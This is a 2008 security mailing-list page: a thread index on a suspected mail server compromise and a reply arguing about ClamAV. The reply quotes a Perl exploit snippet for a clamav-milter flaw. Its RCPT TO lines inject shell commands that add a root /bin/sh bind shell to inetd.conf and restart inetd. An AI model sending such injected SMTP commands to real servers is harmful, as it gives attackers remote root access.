|
|
Incidents
Possible Mail server compromise ? Feb 04 2008 06:28PM Faas M. Mathiasen (faas m mathiasen googlemail com) (3 replies) Re: Possible Mail server compromise ? Feb 12 2008 11:41PM Faas M. Mathiasen (faas m mathiasen googlemail com) (3 replies) Re: Possible Mail server compromise ? Feb 18 2008 07:19PM Faas M. Mathiasen (faas m mathiasen googlemail com) (2 replies) Re: Possible Mail server compromise ? Feb 20 2008 02:43AM Eduardo Tongson (propolice gmail com) (1 replies) Re: Possible Mail server compromise ? Feb 20 2008 07:33PM Faas M. Mathiasen (faas m mathiasen googlemail com) (1 replies) Re: Possible Mail server compromise ? Feb 19 2008 05:35PM Bob Toxen (vger verysecurelinux com) (2 replies) Re: Possible Mail server compromise ? Feb 20 2008 02:14AM Jon Oberheide (jon oberheide org) (1 replies) Re: Possible Mail server compromise ? Feb 20 2008 05:11PM Valdis Kletnieks vt edu (1 replies) Re: Possible Mail server compromise ? Feb 20 2008 07:25PM Faas M. Mathiasen (faas m mathiasen googlemail com) (1 replies) Re: Possible Mail server compromise ? Feb 20 2008 11:07PM Peter Kosinar (goober ksp sk) (1 replies) Re: Possible Mail server compromise ? Feb 21 2008 10:49AM Faas M. Mathiasen (faas m mathiasen googlemail com) (1 replies) RE: Possible Mail server compromise ? Feb 22 2008 12:38AM Richard C Lewis (chad mr-lew com) (1 replies) Re: Possible Mail server compromise ? Feb 26 2008 04:19PM Faas M. Mathiasen (faas m mathiasen googlemail com) Re: Possible Mail server compromise ? Feb 19 2008 06:46PM Faas M. Mathiasen (faas m mathiasen googlemail com) (3 replies) Re: Possible Mail server compromise ? Feb 20 2008 07:05AM Bob Toxen (vger VerySecureLinux com) (1 replies) Re: Possible Mail server compromise ? Feb 20 2008 07:25PM Faas M. Mathiasen (faas m mathiasen googlemail com) Re: Possible Mail server compromise ? Feb 04 2008 07:05PM Jon R. Kibler (Jon Kibler aset com) (1 replies) Re: Possible Mail server compromise ? Feb 04 2008 09:39PM Tony Maupin (tony themaupins com) (1 replies) Re: Possible Mail server compromise ? Feb 04 2008 09:57PM Faas M. Mathiasen (faas m mathiasen googlemail com) (1 replies) |
|
Privacy Statement |
Tue, Feb 19, 2008 at 07:46:35PM +0100, Faas M. Mathiasen wrote:
> ClamAV ? Lowest detection rate in the industry,
Possibly... Where is the statistics?
> no on-access scans
Not relevant to the mail scanning engine.
> and an Anti-virus that was vulnerable to such bugs [1]
Not the ClamAV itself, but clamav-milter in the blackhole mode.
http://www.nruns.com/advisories/[n.runs-SA-2007.025%5D%20-%20ClamAV%20Re
mote%20Code%20Execution%20Advisory.txt
> you consider a great success ? I don't know who you are protecting
> but I hope they were not vulnerable to this :
>
> [1]
> print $sock "ehlo you\r\n";
> print $sock "mail from: <>\r\n";
> print $sock "rcpt to: <nobody+\"|echo '31337 stream tcp nowait root
> /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n";
> print $sock "rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n";
> print $sock "data\r\n.\r\nquit\r\n";
--
Eygene
[ reply ]